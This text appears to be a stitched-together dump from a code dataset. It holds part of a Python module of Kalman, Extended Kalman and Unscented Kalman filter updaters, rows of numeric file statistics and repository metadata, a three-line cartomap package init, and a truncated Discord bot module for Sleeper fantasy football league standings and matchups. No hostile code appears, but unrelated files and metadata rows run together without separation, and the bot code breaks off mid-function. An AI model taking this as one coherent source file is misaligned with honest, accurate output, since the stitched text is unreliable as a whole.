                                                     state_prediction.covar,
                                                     measurement_matrix,
                                                     measurement_noise_covar)

        return GaussianMeasurementPrediction(meas_pred_mean, meas_pred_covar,
                                             state_prediction.timestamp,
                                             cross_covar)

    def update(self, hypothesis, **kwargs):
        """Kalman Filter update step

        Parameters
        ----------
        hypothesis : :class:`~.Hypothesis`
            Hypothesis with predicted state and associated detection used for
            updating.

        Returns
        -------
        : :class:`~.GaussianStateUpdate`
            The computed state posterior
        """
        # Extract model parameters (a model attached to the measurement
        # itself takes precedence over self.measurement_model).
        measurement_matrix, measurement_noise_covar = \
            self._extract_model_parameters(self.measurement_model,
                                           hypothesis.measurement)

        # If no measurement prediction is provided with hypothesis
        if hypothesis.measurement_prediction is None:
            # Perform full update step
            posterior_mean, posterior_covar, meas_pred_mean,\
                meas_pred_covar, cross_covar, _ = \
                self.update_lowlevel(
                    hypothesis.prediction.mean,
                    hypothesis.prediction.covar,
                    measurement_matrix,
                    measurement_noise_covar,
                    hypothesis.measurement.state_vector
                )
            # Augment hypothesis with measurement prediction
            hypothesis = SingleHypothesis(hypothesis.prediction,
                                          hypothesis.measurement,
                                          GaussianMeasurementPrediction(
                                              meas_pred_mean, meas_pred_covar,
                                              hypothesis.prediction.timestamp,
                                              cross_covar)
                                          )
        else:
            # Otherwise, utilise the provided measurement prediction
            posterior_mean, posterior_covar, _ = \
                self.update_on_measurement_prediction(
                    hypothesis.prediction.mean,
                    hypothesis.prediction.covar,
                    hypothesis.measurement.state_vector,
                    hypothesis.measurement_prediction.mean,
                    hypothesis.measurement_prediction.covar,
                    hypothesis.measurement_prediction.cross_covar,
                    measurement_matrix,
                    measurement_noise_covar
                )

        return GaussianStateUpdate(posterior_mean,
                                   posterior_covar,
                                   hypothesis,
                                   hypothesis.measurement.timestamp)

    @staticmethod
    def update_lowlevel(x_pred, P_pred, H, R, y):
        """Low level Kalman Filter update

        Parameters
        ----------
        x_pred: :class:`numpy.ndarray` of shape (Ns,1)
            The predicted state mean
        P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
            The predicted state covariance
        H : :class:`numpy.ndarray` of shape (Nm,Ns)
            The measurement model matrix
        R : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement noise covariance matrix
        y : :class:`numpy.ndarray` of shape (Nm,1)
            The measurement vector

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Ns,1)
            The computed posterior state mean
        : :class:`numpy.ndarray` of shape (Ns,Ns)
            The computed posterior state covariance
        : :class:`numpy.ndarray` of shape (Ns,Nm)
            The computed Kalman gain
        """
        y_pred, S, Pxy = \
            KalmanUpdater.get_measurement_prediction_lowlevel(x_pred,
                                                              P_pred,
                                                              H, R)

        x_post, P_post, K = \
            KalmanUpdater.update_on_measurement_prediction(x_pred, P_pred,
                                                           y, y_pred, S,
                                                           Pxy, H, R)

        return x_post, P_post, y_pred, S, Pxy, K

    @staticmethod
    def get_measurement_prediction_lowlevel(x_pred, P_pred, H, R):
        """Low level Kalman Filter measurement prediction

        Parameters
        ----------
        x_pred: :class:`numpy.ndarray` of shape (Ns,1)
            The predicted state mean
        P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
            The predicted state covariance
        H : :class:`numpy.ndarray` of shape (Nm,Ns)
            The measurement model matrix
        R : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement noise covariance matrix

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Nm,1)
            The predicted measurement mean
        : :class:`numpy.ndarray` of shape (Nm,Nm)
            The predicted measurement noise (innovation) covariance matrix
        : :class:`numpy.ndarray` of shape (Ns,Nm), optional
            The state-to-measurement cross covariance
        """
        # y = Hx ; S = HPH' + R ; Pxy = PH'
        y_pred = H@x_pred
        S = H@P_pred@H.T + R
        Pxy = P_pred@H.T

        return y_pred, S, Pxy

    @staticmethod
    def update_on_measurement_prediction(x_pred, P_pred, y,
                                         y_pred, S, Pxy, H=None, R=None):
        """Low level Kalman Filter update, based on a measurement prediction

        Parameters
        ----------
        x_pred: :class:`numpy.ndarray` of shape (Ns,1)
            The predicted state mean
        P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
            The predicted state covariance
        y : :class:`numpy.ndarray` of shape (Nm,1)
            The measurement vector
        y_pred: :class:`numpy.ndarray` of shape (Nm,1)
            The predicted measurement mean
        S: :class:`numpy.ndarray` of shape (Nm,Nm)
            The predicted measurement noise (innovation) covariance matrix
        Pxy: :class:`numpy.ndarray` of shape (Ns,Nm), optional
            The state-to-measurement cross covariance
        H: :class:`numpy.ndarray` of shape (Nm,Nm), optional
            The measurement model matrix. If both `H` and `R` are provided
            then the update will be performed based on the slower, but more
            numerically stable, "Joseph form" update equation:
            :math:`P_{k|k} = (I-K_kH_k)P_{k|k-1}(I-K_kH_k)^T + K_kR_kK_k^T`
            (default is `None`)
        R: :class:`numpy.ndarray` of shape (Nm,Nm), optional
            The measurement noise covariance matrix. See information for `H`
            above.

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Ns,1)
            The computed posterior state mean
        : :class:`numpy.ndarray` of shape (Ns,Ns)
            The computed posterior state covariance
        : :class:`numpy.ndarray` of shape (Ns,Nm)
            The computed Kalman gain
        """
        # pinv (rather than inv) so a singular innovation covariance does not
        # raise.
        K = Pxy@np.linalg.pinv(S)

        x_post = x_pred + K@(y-y_pred)

        if(H is not None and R is not None):
            # P = (I-KH)P(I-KH)' + KRK' is more numerically stable
            # and works for non-optimal K vs the equation
            # P = (I-KH)P usually seen in the literature.
            ndim_state = x_pred.shape[0]
            I_KH = np.eye(ndim_state) - K@H
            P_post = I_KH@P_pred@I_KH.T + K@R@K.T
        elif(H is not None):
            ndim_state = x_pred.shape[0]
            P_post = (np.eye(ndim_state) - K@H)@P_pred
        else:
            P_post = P_pred - K@Pxy.T

        # Enforce symmetry against numerical drift.
        P_post = (P_post+P_post.T)/2

        return x_post, P_post, K

    @staticmethod
    def _extract_model_parameters(measurement_model, measurement=None,
                                  **kwargs):
        """Extract measurement model parameters

        Parameters
        ----------
        measurement_model: :class:`~.MeasurementModel`
            A measurement model whose parameters are to be extracted
        measurement : :class:`~.Detection`, optional
            If provided and `measurement.measurement_model` is not `None`,\
            then its parameters will be returned instead\
            (the default is `None`, in which case `self.measurement_model`'s\
            parameters will be returned)

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement model transformation matrix
        : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement model covariance matrix
        """
        if(measurement is not None
           and measurement.measurement_model is not None):
            measurement_matrix = measurement.measurement_model.matrix(**kwargs)
            measurement_noise_covar = measurement.measurement_model.covar(
                **kwargs)
        else:
            measurement_matrix = measurement_model.matrix(**kwargs)
            measurement_noise_covar = measurement_model.covar(**kwargs)

        return measurement_matrix, measurement_noise_covar
class ExtendedKalmanUpdater(KalmanUpdater):
    """Extended Kalman Updater

    Perform measurement update step in the Extended Kalman Filter.
    """

    # NOTE(review): lru_cache on an instance method keys on `self` and keeps
    # every instance alive for the cache's lifetime — confirm intentional.
    @lru_cache()
    def get_measurement_prediction(self, state_prediction,
                                   measurement_model=None, **kwargs):
        """Extended Kalman Filter measurement prediction step

        Parameters
        ----------
        state_prediction : :class:`~.GaussianStatePrediction`
            A predicted state object
        measurement_model: :class:`~.MeasurementModel`, optional
            The measurement model used to generate the measurement prediction.\
            Should be used in cases where the measurement model is dependent\
            on the received measurement.\
            (the default is ``None``, in which case the updater will use the\
            measurement model specified on initialisation)

        Returns
        -------
        : :class:`~.GaussianMeasurementPrediction`
            The measurement prediction
        """
        # Measurement model parameters: fall back to the model configured on
        # the updater when none is supplied.
        if measurement_model is None:
            measurement_model = self.measurement_model

        measurement_matrix, measurement_noise_covar, measurement_function = \
            self._extract_model_parameters(measurement_model,
                                           state_prediction.state_vector)

        meas_pred_mean, meas_pred_covar, cross_covar = \
            self.get_measurement_prediction_lowlevel(state_prediction.mean,
                                                     state_prediction.covar,
                                                     measurement_function,
                                                     measurement_matrix,
                                                     measurement_noise_covar)

        return GaussianMeasurementPrediction(meas_pred_mean, meas_pred_covar,
                                             state_prediction.timestamp,
                                             cross_covar)

    def update(self, hypothesis, **kwargs):
        """ Extended Kalman Filter update step

        Parameters
        ----------
        hypothesis : :class:`~.Hypothesis`
            Hypothesis with predicted state and associated detection used for
            updating.

        Returns
        -------
        : :class:`~.GaussianStateUpdate`
            The state posterior
        """
        # Extract model parameters (a model attached to the measurement
        # itself takes precedence over self.measurement_model).
        measurement_matrix, measurement_noise_covar, measurement_function = \
            self._extract_model_parameters(self.measurement_model,
                                           hypothesis.prediction.state_vector,
                                           hypothesis.measurement)

        # If no measurement prediction is provided with hypothesis
        if hypothesis.measurement_prediction is None:
            # Perform full update step
            posterior_mean, posterior_covar, meas_pred_mean,\
                meas_pred_covar, cross_covar, _ = \
                self.update_lowlevel(
                    hypothesis.prediction.mean,
                    hypothesis.prediction.covar,
                    measurement_function,
                    measurement_matrix,
                    measurement_noise_covar,
                    hypothesis.measurement.state_vector
                )
            # Augment hypothesis with measurement prediction
            hypothesis = SingleHypothesis(hypothesis.prediction,
                                          hypothesis.measurement,
                                          GaussianMeasurementPrediction(
                                              meas_pred_mean, meas_pred_covar,
                                              hypothesis.prediction.timestamp,
                                              cross_covar)
                                          )
        else:
            # Otherwise, utilise the provided measurement prediction
            posterior_mean, posterior_covar, _ = \
                self.update_on_measurement_prediction(
                    hypothesis.prediction.mean,
                    hypothesis.prediction.covar,
                    hypothesis.measurement.state_vector,
                    hypothesis.measurement_prediction.mean,
                    hypothesis.measurement_prediction.covar,
                    hypothesis.measurement_prediction.cross_covar,
                    measurement_matrix,
                    measurement_noise_covar
                )

        return GaussianStateUpdate(posterior_mean,
                                   posterior_covar,
                                   hypothesis,
                                   hypothesis.measurement.timestamp)

    @staticmethod
    def update_lowlevel(x_pred, P_pred, h, H, R, y):
        """Low level Extended Kalman Filter update

        Parameters
        ----------
        x_pred: :class:`numpy.ndarray` of shape (Ns,1)
            The predicted state mean
        P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
            The predicted state covariance
        h : function handle
            The (non-linear) measurement model function
            Must be of the form "y = fun(x)"
        H : :class:`numpy.ndarray` of shape (Nm,Ns)
            The measurement model jacobian matrix
        R : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement noise covariance matrix
        y : :class:`numpy.ndarray` of shape (Nm,1)
            The measurement vector

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Ns,1)
            The computed posterior state mean
        : :class:`numpy.ndarray` of shape (Ns,Ns)
            The computed posterior state covariance
        : :class:`numpy.ndarray` of shape (Ns,Nm)
            The computed Kalman gain
        """
        y_pred, S, Pxy = \
            ExtendedKalmanUpdater.get_measurement_prediction_lowlevel(x_pred,
                                                                      P_pred,
                                                                      h,
                                                                      H,
                                                                      R)

        x_post, P_post, K = \
            ExtendedKalmanUpdater.update_on_measurement_prediction(x_pred,
                                                                   P_pred,
                                                                   y,
                                                                   y_pred,
                                                                   S,
                                                                   Pxy,
                                                                   H,
                                                                   R)

        return x_post, P_post, y_pred, S, Pxy, K

    @staticmethod
    def get_measurement_prediction_lowlevel(x_pred, P_pred, h, H, R):
        """Low level Extended Kalman Filter measurement prediction

        Parameters
        ----------
        x_pred: :class:`numpy.ndarray` of shape (Ns,1)
            The predicted state mean
        P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
            The predicted state covariance
        h : function handle
            The (non-linear) measurement model function
            Must be of the form "y = fun(x)"
        H : :class:`numpy.ndarray` of shape (Nm,Ns)
            The measurement model jacobian matrix
        R : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement noise covariance matrix

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Nm,1)
            The predicted measurement mean
        : :class:`numpy.ndarray` of shape (Nm,Nm)
            The predicted measurement noise (innovation) covariance matrix
        : :class:`numpy.ndarray` of shape (Ns,Nm), optional
            The state-to-measurement cross covariance
        """
        # Mean is propagated through the non-linear function; covariances use
        # the (linearised) jacobian.
        y_pred = h(x_pred)
        S = H@P_pred@H.T + R
        Pxy = P_pred@H.T

        return y_pred, S, Pxy

    @staticmethod
    def update_on_measurement_prediction(x_pred, P_pred, y,
                                         y_pred, S, Pxy, H=None, R=None):
        """Low level Extended Kalman Filter update, based on a measurement\
        prediction

        Parameters
        ----------
        x_pred: :class:`numpy.ndarray` of shape (Ns,1)
            The predicted state mean
        P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
            The predicted state covariance
        y : :class:`numpy.ndarray` of shape (Nm,1)
            The measurement vector
        y_pred: :class:`numpy.ndarray` of shape (Nm,1)
            The predicted measurement mean
        S: :class:`numpy.ndarray` of shape (Nm,Nm)
            The predicted measurement noise (innovation) covariance matrix
        Pxy: :class:`numpy.ndarray` of shape (Ns,Nm), optional
            The state-to-measurement cross covariance
        H: :class:`numpy.ndarray`, optional
            The measurement model jacobian matrix; forwarded to the base-class
            update (see :meth:`KalmanUpdater.update_on_measurement_prediction`)
        R: :class:`numpy.ndarray`, optional
            The measurement noise covariance matrix; forwarded to the
            base-class update

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Ns,1)
            The computed posterior state mean
        : :class:`numpy.ndarray` of shape (Ns,Ns)
            The computed posterior state covariance
        : :class:`numpy.ndarray` of shape (Ns,Nm)
            The computed Kalman gain
        """
        # Identical to the linear Kalman update once the prediction is made.
        return KalmanUpdater.update_on_measurement_prediction(x_pred, P_pred,
                                                              y, y_pred, S,
                                                              Pxy, H, R)

    @staticmethod
    def _extract_model_parameters(measurement_model, state_vector=None,
                                  measurement=None, **kwargs):
        """Extract measurement model parameters

        Parameters
        ----------
        measurement_model: :class:`~.MeasurementModel`
            A measurement model whose parameters are to be extracted
        state_vector : :class:`numpy.ndarray`, optional
            State vector about which a non-linear model is linearised
            (passed to the model's ``jacobian``)
        measurement : :class:`~.Detection`, optional
            If provided and `measurement.measurement_model` is not `None`,\
            then its parameters will be returned instead\
            (the default is `None`, in which case `self.measurement_model`'s\
            parameters will be returned)

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement model transformation (or jacobian) matrix
        : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement model covariance matrix
        : function handle
            The noiseless measurement model function
        """
        if(measurement is not None
           and measurement.measurement_model is not None):
            return ExtendedKalmanUpdater._extract_model_parameters(
                measurement.measurement_model, state_vector=state_vector)
        else:
            try:
                # Attempt to extract matrix from a LinearModel
                measurement_matrix = measurement_model.matrix(**kwargs)
            except AttributeError:
                # Else read jacobian from a NonLinearModel
                measurement_matrix = \
                    measurement_model.jacobian(state_vector,
                                               **kwargs)

            def measurement_function(x):
                return measurement_model.function(x, noise=0, **kwargs)

            measurement_noise_covar = measurement_model.covar(**kwargs)

            return measurement_matrix, measurement_noise_covar, \
                measurement_function
class UnscentedKalmanUpdater(KalmanUpdater):
    """Unscented Kalman Updater

    Perform measurement update step in the Unscented Kalman Filter.
    """

    alpha = Property(float, default=0.5,
                     doc="Primary sigma point spread scalling parameter.\
                     Typically 1e-3.")
    beta = Property(float, default=2,
                    doc="Used to incorporate prior knowledge of the distribution.\
                    If the true distribution is Gaussian, the value of 2\
                    is optimal.")
    kappa = Property(float, default=0,
                     doc="Secondary spread scaling parameter\
                     (default is calculated as 3-Ns)")

    @lru_cache()
    def get_measurement_prediction(self, state_prediction,
                                   measurement_model=None, **kwargs):
        """Unscented Kalman Filter measurement prediction step

        Parameters
        ----------
        state_prediction : :class:`~.GaussianStatePrediction`
            A predicted state object
        measurement_model: :class:`~.MeasurementModel`, optional
            The measurement model used to generate the measurement prediction.\
            Should be used in cases where the measurement model is dependent\
            on the received measurement.\
            (the default is ``None``, in which case the updater will use the\
            measurement model specified on initialisation)

        Returns
        -------
        : :class:`~.GaussianMeasurementPrediction`
            The measurement prediction
        """
        # Measurement model parameters: fall back to the model configured on
        # the updater when none is supplied.
        if measurement_model is None:
            measurement_model = self.measurement_model

        measurement_function, measurement_noise_covar = \
            self._extract_model_parameters(measurement_model)

        # BUGFIX(review): the original contained an unreachable duplicate of
        # the two statements below *after* this return; the dead code has
        # been removed.
        meas_pred_mean, meas_pred_covar, cross_covar = \
            self.get_measurement_prediction_lowlevel(state_prediction.mean,
                                                     state_prediction.covar,
                                                     measurement_function,
                                                     measurement_noise_covar,
                                                     self.alpha, self.beta,
                                                     self.kappa)

        return GaussianMeasurementPrediction(meas_pred_mean, meas_pred_covar,
                                             state_prediction.timestamp,
                                             cross_covar)

    def update(self, hypothesis, **kwargs):
        """ Unscented Kalman Filter update step

        Parameters
        ----------
        hypothesis : :class:`~.Hypothesis`
            Hypothesis with predicted state and associated detection used for
            updating.

        Returns
        -------
        : :class:`~.GaussianStateUpdate`
            The state posterior
        """
        # Extract model parameters (a model attached to the measurement
        # itself takes precedence over self.measurement_model).
        measurement_function, measurement_noise_covar = \
            self._extract_model_parameters(self.measurement_model,
                                           hypothesis.measurement)

        # If no measurement prediction is provided with hypothesis
        if hypothesis.measurement_prediction is None:
            # Perform full update step
            posterior_mean, posterior_covar, meas_pred_mean,\
                meas_pred_covar, cross_covar, _ = \
                self.update_lowlevel(
                    hypothesis.prediction.mean,
                    hypothesis.prediction.covar,
                    measurement_function,
                    measurement_noise_covar,
                    hypothesis.measurement.state_vector,
                    self.alpha, self.beta, self.kappa
                )
            # Augment hypothesis with measurement prediction
            hypothesis = SingleHypothesis(hypothesis.prediction,
                                          hypothesis.measurement,
                                          GaussianMeasurementPrediction(
                                              meas_pred_mean, meas_pred_covar,
                                              hypothesis.prediction.timestamp,
                                              cross_covar)
                                          )
        else:
            # Otherwise, utilise the provided measurement prediction
            posterior_mean, posterior_covar, _ =\
                self.update_on_measurement_prediction(
                    hypothesis.prediction.mean,
                    hypothesis.prediction.covar,
                    hypothesis.measurement.state_vector,
                    hypothesis.measurement_prediction.mean,
                    hypothesis.measurement_prediction.covar,
                    hypothesis.measurement_prediction.cross_covar
                )

        return GaussianStateUpdate(posterior_mean,
                                   posterior_covar,
                                   hypothesis,
                                   hypothesis.measurement.timestamp)

    @staticmethod
    def update_lowlevel(x_pred, P_pred, h, R, y, alpha, beta, kappa):
        """Low level Unscented Kalman Filter update

        Parameters
        ----------
        x_pred: :class:`numpy.ndarray` of shape (Ns,1)
            The predicted state mean
        P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
            The predicted state covariance
        h : function handle
            The (non-linear) measurement model function
            Must be of the form "y = fun(x,w)"
        R : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement noise covariance matrix
        y : :class:`numpy.ndarray` of shape (Nm,1)
            The measurement vector
        alpha : float
            Spread of the sigma points.
        beta : float
            Used to incorporate prior knowledge of the distribution
            2 is optimal is the state is normally distributed.
        kappa : float
            Secondary spread scaling parameter

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Ns,1)
            The computed posterior state mean
        : :class:`numpy.ndarray` of shape (Ns,Ns)
            The computed posterior state covariance
        : :class:`numpy.ndarray` of shape (Ns,Nm)
            The computed Kalman gain
        """
        y_pred, S, Pxy = \
            UnscentedKalmanUpdater.get_measurement_prediction_lowlevel(
                x_pred, P_pred, h, R,
                alpha, beta, kappa)

        x_post, P_post, K = \
            UnscentedKalmanUpdater.update_on_measurement_prediction(
                x_pred, P_pred, y, y_pred, S, Pxy)

        return x_post, P_post, y_pred, S, Pxy, K

    @staticmethod
    def get_measurement_prediction_lowlevel(x_pred, P_pred, h, R,
                                            alpha, beta, kappa):
        """Low level Unscented Kalman Filter measurement prediction

        Parameters
        ----------
        x_pred: :class:`numpy.ndarray` of shape (Ns,1)
            The predicted state mean
        P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
            The predicted state covariance
        h : function handle
            The (non-linear) measurement model function
            Must be of the form "y = fun(x,w)"
        R : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement noise covariance matrix
        alpha : float
            Spread of the sigma points.
        beta : float
            Used to incorporate prior knowledge of the distribution
            2 is optimal is the state is normally distributed.
        kappa : float
            Secondary spread scaling parameter

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Nm,1)
            The predicted measurement mean
        : :class:`numpy.ndarray` of shape (Nm,Nm)
            The predicted measurement noise (innovation) covariance matrix
        : :class:`numpy.ndarray` of shape (Ns,Nm), optional
            The state-to-measurement cross covariance
        """
        # Generate sigma points from the predicted Gaussian, then propagate
        # them through the (non-linear) measurement function.
        sigma_points, mean_weights, covar_weights = \
            gauss2sigma(x_pred, P_pred, alpha, beta, kappa)

        y_pred, S, Pxy, _, _, _ = unscented_transform(sigma_points,
                                                      mean_weights,
                                                      covar_weights,
                                                      h, covar_noise=R)

        return y_pred, S, Pxy

    @staticmethod
    def update_on_measurement_prediction(x_pred, P_pred, y,
                                         y_pred, S, Pxy):
        """Low level Unscented Kalman Filter update, based on a measurement\
        prediction

        Parameters
        ----------
        x_pred: :class:`numpy.ndarray` of shape (Ns,1)
            The predicted state mean
        P_pred: :class:`numpy.ndarray` of shape (Ns,Ns)
            The predicted state covariance
        y : :class:`numpy.ndarray` of shape (Nm,1)
            The measurement vector
        y_pred: :class:`numpy.ndarray` of shape (Nm,1)
            The predicted measurement mean
        S: :class:`numpy.ndarray` of shape (Nm,Nm)
            The predicted measurement noise (innovation) covariance matrix
        Pxy: :class:`numpy.ndarray` of shape (Ns,Nm), optional
            The state-to-measurement cross covariance

        Returns
        -------
        : :class:`numpy.ndarray` of shape (Ns,1)
            The computed posterior state mean
        : :class:`numpy.ndarray` of shape (Ns,Ns)
            The computed posterior state covariance
        : :class:`numpy.ndarray` of shape (Ns,Nm)
            The computed Kalman gain
        """
        # Identical to the linear Kalman update once the prediction is made.
        return KalmanUpdater.update_on_measurement_prediction(x_pred, P_pred,
                                                              y, y_pred, S,
                                                              Pxy)

    @staticmethod
    def _extract_model_parameters(measurement_model, measurement=None,
                                  **kwargs):
        """Extract measurement model parameters

        Parameters
        ----------
        measurement_model: :class:`~.MeasurementModel`
            A measurement model whose parameters are to be extracted
        measurement : :class:`~.Detection`, optional
            If provided and `measurement.measurement_model` is not `None`,\
            then its parameters will be returned instead\
            (the default is `None`, in which case `self.measurement_model`'s\
            parameters will be returned)

        Returns
        -------
        : function handle
            The (non-linear) measurement model function
        : :class:`numpy.ndarray` of shape (Nm,Nm)
            The measurement model covariance matrix
        """
        if(measurement is not None
           and measurement.measurement_model is not None):
            return UnscentedKalmanUpdater._extract_model_parameters(
                measurement.measurement_model)
        else:
            def measurement_function(x, w=0):
                return measurement_model.function(x, w, **kwargs)

            measurement_noise_covar = measurement_model.covar(**kwargs)

            return measurement_function, measurement_noise_covar
| 41.311751
| 82
| 0.541011
| 3,265
| 34,454
| 5.552221
| 0.064319
| 0.072374
| 0.072209
| 0.080704
| 0.90203
| 0.893149
| 0.873235
| 0.863857
| 0.841792
| 0.840909
| 0
| 0.002178
| 0.38698
| 34,454
| 833
| 83
| 41.361345
| 0.856115
| 0.397138
| 0
| 0.700617
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.061728
| false
| 0
| 0.024691
| 0.006173
| 0.175926
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
92a48888f3684ea726a941442827c5b22e80e9a9
| 140
|
py
|
Python
|
cartomap/__init__.py
|
mrinalghosh/cartomap
|
741c5916ad180b382dd1e60e5c8bb5168899c878
|
[
"MIT"
] | 1
|
2020-12-09T05:39:28.000Z
|
2020-12-09T05:39:28.000Z
|
cartomap/__init__.py
|
mrinalghosh/cartomap
|
741c5916ad180b382dd1e60e5c8bb5168899c878
|
[
"MIT"
] | null | null | null |
cartomap/__init__.py
|
mrinalghosh/cartomap
|
741c5916ad180b382dd1e60e5c8bb5168899c878
|
[
"MIT"
] | null | null | null |
from .geogmap import plotCartoMap # noqa: F401
from .geogmap import plotKeogram # noqa: F401
from .geogmap import plotSlice # noqa: F401
| 35
| 47
| 0.764286
| 18
| 140
| 5.944444
| 0.444444
| 0.308411
| 0.476636
| 0.35514
| 0.46729
| 0
| 0
| 0
| 0
| 0
| 0
| 0.077586
| 0.171429
| 140
| 3
| 48
| 46.666667
| 0.844828
| 0.228571
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
2bc6682a0a113004f1bcd408dfb86dafa5fd67ab
| 9,776
|
py
|
Python
|
sleeper_bot_commands/league.py
|
StoneMasons4106/sleeper-ffl-discordbot
|
a4f122f168561c154b889a17264b962264a0a20f
|
[
"MIT"
] | 1
|
2021-08-25T13:24:48.000Z
|
2021-08-25T13:24:48.000Z
|
sleeper_bot_commands/league.py
|
StoneMasons4106/sleeper-ffl-discordbot
|
a4f122f168561c154b889a17264b962264a0a20f
|
[
"MIT"
] | 2
|
2021-09-17T20:44:04.000Z
|
2021-09-23T23:38:36.000Z
|
sleeper_bot_commands/league.py
|
StoneMasons4106/sleeper-ffl-discordbot
|
a4f122f168561c154b889a17264b962264a0a20f
|
[
"MIT"
] | 1
|
2021-09-10T16:43:09.000Z
|
2021-09-10T16:43:09.000Z
|
import discord
import os
import sleeper_wrapper
import functions
if os.path.exists("env.py"):
import env
def my_league(ctx, bot):
    """Build a summary of the guild's configured Sleeper league.

    Parameters
    ----------
    ctx : command context; ``ctx.guild`` is ``None`` when invoked from a DM.
    bot : the Discord bot instance, forwarded to ``functions.my_embed``.

    Returns
    -------
    A Discord embed with league name, members, deadlines and scoring type,
    or a plain error string when called from a DM or when no league is
    configured for the guild.
    """
    if ctx.guild is None:
        # Guild-only command: there is no per-guild league config in a DM.
        return 'This command is only available when sent in a guild rather than a DM. Try again there.'

    existing_league = functions.get_existing_league(ctx)
    if not existing_league or "league" not in existing_league:
        # No league configured for this guild yet (single deduplicated branch).
        return functions.my_embed('Sleeper League Info', 'Sleeper League Name and Member Info', discord.Colour.blue(), 'Members', 'No league specified, run add-league command to complete setup.', False, bot)

    league_id = existing_league["league"]
    # Construct the API wrapper once instead of once per call.
    league_api = sleeper_wrapper.League(int(league_id))
    league = league_api.get_league()
    users = [user["display_name"] for user in league_api.get_users()]

    embed = functions.my_embed('Sleeper League Info', 'Sleeper League General Information', discord.Colour.blue(), 'Name', f'[{league["name"]}](https://sleeper.app/leagues/{league_id})', False, bot)
    embed.add_field(name='Members', value=", ".join(users), inline=False)
    embed.add_field(name='Quantity', value=len(users), inline=False)
    embed.add_field(name='Trade Deadline', value=f"Week {league['settings']['trade_deadline']}", inline=False)
    embed.add_field(name='Playoffs Start', value=f"Week {league['settings']['playoff_week_start']}", inline=False)

    # Map Sleeper's score_type codes to human-readable labels; unknown or
    # missing codes add no field (same as the original if/elif chain).
    score_labels = {'pts_ppr': 'PPR', 'pts_half_ppr': 'Half PPR', 'pts_std': 'Standard'}
    score_type = existing_league.get("score_type")
    if score_type in score_labels:
        embed.add_field(name='Scoring Type', value=score_labels[score_type], inline=False)

    return embed
def my_league_standings(ctx, bot):
    """Build a Discord embed with the configured Sleeper league's standings.

    Parameters:
        ctx: command context; must originate from a guild (not a DM).
        bot: bot instance, forwarded to functions.my_embed.

    Returns:
        A discord embed, or a plain error string when used in a DM.
    """
    if ctx.guild is None:
        return 'This command is only available when sent in a guild rather than a DM. Try again there.'
    existing_league = functions.get_existing_league(ctx)
    if not existing_league or "league" not in existing_league:
        # Both "no record" and "record without league id" cases share one
        # message (previously duplicated in two else branches).
        return functions.my_embed('Sleeper League Standings', 'Display Current Standings of Sleeper League', discord.Colour.blue(), 'Standings', 'No league specified, run add-league command to complete setup.', False, bot)
    league_id = existing_league["league"]
    users_object = sleeper_wrapper.League(int(league_id)).get_users()
    rosters_object = sleeper_wrapper.League(int(league_id)).get_rosters()
    # Rosters without an owner (abandoned teams) are excluded before
    # computing standings, as in the original implementation.
    filtered_roster_object = [roster for roster in rosters_object if roster["owner_id"] is not None]
    standings_object = sleeper_wrapper.League(int(league_id)).get_standings(filtered_roster_object, users_object)
    # Each standings entry is (team_name, wins, losses, points_for).
    standings_string = ''.join(
        f'{place}. {team[0]} / Record: {team[1]}-{team[2]} / Points For: {team[3]}\n'
        for place, team in enumerate(standings_object, start=1)
    )
    return functions.my_embed('Sleeper League Standings', 'Display Current Standings of Sleeper League', discord.Colour.blue(), 'Standings', standings_string, False, bot)
def my_league_matchups(ctx, bot, week):
    """Build a Discord embed listing the league's matchups for a given week.

    Parameters:
        ctx: command context; must originate from a guild (not a DM).
        bot: bot instance, forwarded to functions.my_embed.
        week: week number as a string; must be numeric and within 1-18.

    Returns:
        A discord embed, or a plain error string on validation failure.
    """
    # Guard clauses replace the original six-level nesting with duplicated
    # error strings in each else branch.
    if ctx.guild is None:
        return 'This command is only available when sent in a guild rather than a DM. Try again there.'
    if not week.isnumeric() or not 1 <= int(week) <= 18:
        return 'Invalid week number given. Choose a valid week between 1 and 18.'
    existing_league = functions.get_existing_league(ctx)
    if not existing_league or "league" not in existing_league:
        return 'Please run add-league command, no Sleeper League connected.'
    league_id = existing_league["league"]
    users = sleeper_wrapper.League(int(league_id)).get_users()
    rosters = sleeper_wrapper.League(int(league_id)).get_rosters()
